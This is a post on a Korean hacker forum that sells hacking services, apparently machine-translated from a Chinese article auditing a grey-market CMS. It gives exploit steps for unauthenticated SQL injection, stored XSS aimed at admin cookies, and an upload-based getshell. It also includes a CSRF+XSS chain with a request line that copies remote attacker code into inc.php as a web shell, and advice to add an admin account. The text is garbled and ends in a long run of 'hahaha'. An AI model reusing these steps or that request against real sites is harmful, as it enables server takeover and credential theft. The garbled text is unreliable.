[ HOME ]  [ 개인정보 보호정책 ]  [ 0day ]  [ 업무 합작 ]  [ 해킹 서비스 ]  [ 프로젝트 개발 ]  [ faq ]  [ 연락하기 ]  [ 원격 제어 트로이 목마 ]  [ 지불 ]    사용자: 25793     
Telegram

제목 : 회색 산업 CMS의 코드 감사 기록

K

KoreanHackerTeam

Moderator

一、目录结构​

먼저, 구조를 살펴 보겠습니다. 시스템 폴더에는 관련 코드가 있습니다. 허점을 직접 보여 드리겠습니다.
图片

二、审计出洞​

1. 쇼핑 카트가 정보를 비동기식으로 가져옵니다 - SQL 주입
시스템 \ modules \ member \ cart.action.php
图片

단일 따옴표를 필터링하지만 여기서는 단일 따옴표로 보호되지 않으므로 여기에 주입이되며 사용자 ID는 확인되지 않습니다. 주사는 사이트 외부에서 로그인하지 않고 수행 할 수 있습니다.
图片

图片

직접 공식 웹 사이트 Hahahaha!
2. BOM 플러그인-디렉토리
시스템/플러그인/bom/bom.plugin.php
图片

직접 액세스하십시오. 배경이 변경 되더라도 아무런 문제가 없습니다. 여전히 옳습니다!
图片

3. 주문 저장소 XSS (관리자 쿠키에 전화 할 수 있음)
이 CMS 세트가 일찍 나왔기 때문에 많은 Xiaohei가 XSS 취약점을 발견했지만 XSS는 0 일인 것 같습니다. 하하하, 주문 함수를 게시해야합니다. 여기서 나는 그것을 먼저 겪는 과정을 보여줄 것이다.
图片

사진 추가
图片

이미지 주소를 XSS 문으로 변경하십시오
图片

FileUrl_tmp 매개 변수
图片

현재 IMG 태그가 닫히고 1 개의 팝업 (백그라운드에서 관리되는 "Show Order View"를 트리거합니다).
图片

4. 구성-백엔드 getshell 업로드
어떤 사람들은 백그라운드에 업로드가 있음을 알 수 있지만 실제로 이러한 업로드는 사용할 수 없습니다. 백그라운드에서 화이트리스트의 서식을 변경할 수 있지만 여전히 언급 할 수 없습니다. 지금은 . 그냥 참여하십시오! ~~
图片

단일 따옴표를 필터링하므로 여기에는 단일 따옴표가 없습니다.
图片

허용 업로드 유형에 pyload를 쓰십시오
图片

복사 기능을 통해 원격 말을 작성 한 후에 완료되었습니다.
图片

5. 백그라운드 검증 코드에 결함이 있습니다
图片

기본 계정 관리자이 MD5 값의 문자열은 해당 검증 코드 값이며, 여기서는 여기에서 폭파를 위해 호출 될 수 있습니다. 또한 작은 결함입니다
6. 조합 펀치 getshell-csrf+xss
우리는 XSS를 직접 사용하여 HTML 페이지를 중첩 한 다음 모든 작업을 시뮬레이션합니다. 끝났습니다. 업로드 형식 수정 및 액세스 시뮬레이션을 위해 말을 삽입하는 것부터 시작
[/index.php/admin/setting/upload?c=copy('http://www.xxx.txt' ,'./inc.php ');
그냥 열을 치고 완료하십시오. 걱정하지 않으면 결국 관리자를 추가하십시오.
이 CMS 세트는 CSRF 공격을 필터링하지 않으며 스크린 샷을 찍지 않습니다. 내 사촌의 자세는 나보다 섹시합니다. 우와, Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha 일 ahahahahahahahahahahahahahahahahahahahahahahahahahahahajahahahahahahahahahahahahahahahahahahahahahahahaahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha 일
원래 링크에서 재 인쇄 : https://mp.weixin.qq.com/s/8otu9yq3pxj6k2qpbeznra
 
여기에 답변하려면 로그인 또는 등록해야합니다.

Partner Website: HACKHUB TW hacker Team Black hat dark Web hacking team HACKING FOURM HACKER.BZ UKhacker
대한민국 최대 해커 포럼:본 사이트의 튜토리얼, 글, 도구 및 기타 관련 내용은 학습과 연구용으로만 제공되며, 그 목적은 대중의 인터넷 보안의식과 보안능력을 제고하는 것입니다.
우리는 어떤 형식의 불법 활동이든 강력히 반대하며, 타인의 네트워크 시스템에 침입하거나 공격하거나 파괴하는 허가 없는 행위를 금지한다.
Copyright © 2013-2025 KRHACK 당신은 우리의 텔레그램에 연락해서 업무 협력을 할 수 있다: @APTs37  웹 싸이트 지도Sitemap
뒤로
상단